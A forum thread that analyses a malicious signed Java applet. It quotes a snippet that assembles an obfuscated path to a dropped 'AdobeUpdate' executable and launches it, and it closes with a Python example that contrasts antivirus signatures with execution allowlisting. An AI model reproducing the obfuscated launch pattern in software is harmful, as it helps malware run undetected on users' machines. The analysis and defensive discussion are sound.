
It's a long time since I went anywhere near Java (let alone an applet) - but these lines don't look very nice:

  String str2 = System.getenv("APPDATA");
  String str5 = str2 + "\\";
  String str6 = "AdobeUpdate-Setup1.84##e";
  String str9 = str5.concat(str6.replace("##", ".ex"));     
  Runtime.getRuntime().exec(str9);


From a quick glance it would appear it tries to execute:

C:\Users\<username>\AppData\Roaming\AdobeUpdate-Setup1.84.exe

Just appears to be a rudimentary attempt at obfuscating the executable path.

The question is, how come the JVM is allowing Runtime.getRuntime().exec() to be called?


According to an upthread commenter, it's digitally signed, which allows a prompt to the user for elevated permissions.


An evil wee signed applet.


I think that's done to fool AV software - AV software will probably flag up any string which equals "AdobeUpdate-Setup1.exe"


All AV software is about that dumb as far as I know. Anyone who is depending on AV software to protect things like actual money is in serious trouble.


You can't really expect it to do much more in this case: you can make the computation which results in ".exe" arbitrarily complex, and detection needs to be cheap. Ultimately the problem is that AV software is in the business of enumerating badness. You need to do whitelisting, for example of who gets to execute arbitrary code, which is the problem here.
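
Added example (not part of any comment in this thread): the contrast drawn in the last comment, as a check over constructed process-creation events. A literal-string signature finds nothing in the strings the applet stores, while an allowlist of directories that executables may start from flags the launch no matter how the path was assembled. The event field names, the allowlist contents, the signature entry and the sample events are assumptions.

```python
import ntpath

# Assumption: directories from which executables are permitted to start.
ALLOWED_DIRS = (r"c:\windows\system32", r"c:\program files")

# Literal stored in the applet, as quoted in the snippet at the top of the thread.
STATIC_LITERAL = "AdobeUpdate-Setup1.84##e"
# Hypothetical blocklist entry of the kind a string signature would carry.
SIGNATURE = "AdobeUpdate-Setup1.84.exe"


def signature_hit(static_strings):
    """Blocklist approach: look for the bad name among strings stored in the file."""
    return any(SIGNATURE.lower() in s.lower() for s in static_strings)


def is_allowed(image_path):
    """Allowlist approach: the launched image must sit under an approved directory."""
    # Normalise first so "..\" segments cannot fake an approved prefix.
    norm = ntpath.normpath(image_path).lower()
    return any(norm == d or norm.startswith(d + "\\") for d in ALLOWED_DIRS)


def review(events):
    """Return (parent, image) for every process start outside the allowlist."""
    return [(e["parent"], e["image"]) for e in events if not is_allowed(e["image"])]


# Constructed process-creation events; field names are hypothetical.
EVENTS = [
    {"parent": r"C:\Program Files\Java\jre7\bin\javaw.exe",
     "image": r"C:\Windows\System32\notepad.exe"},
    {"parent": r"C:\Program Files\Java\jre7\bin\javaw.exe",
     "image": r"C:\Users\alice\AppData\Roaming\AdobeUpdate-Setup1.84.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\..\Users\alice\AppData\Roaming\x.exe"},
]

if __name__ == "__main__":
    print("signature hit on static strings:",
          signature_hit([STATIC_LITERAL, "APPDATA"]))
    for parent, image in review(EVENTS):
        print("blocked:", image, "<- started by", parent)
```
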



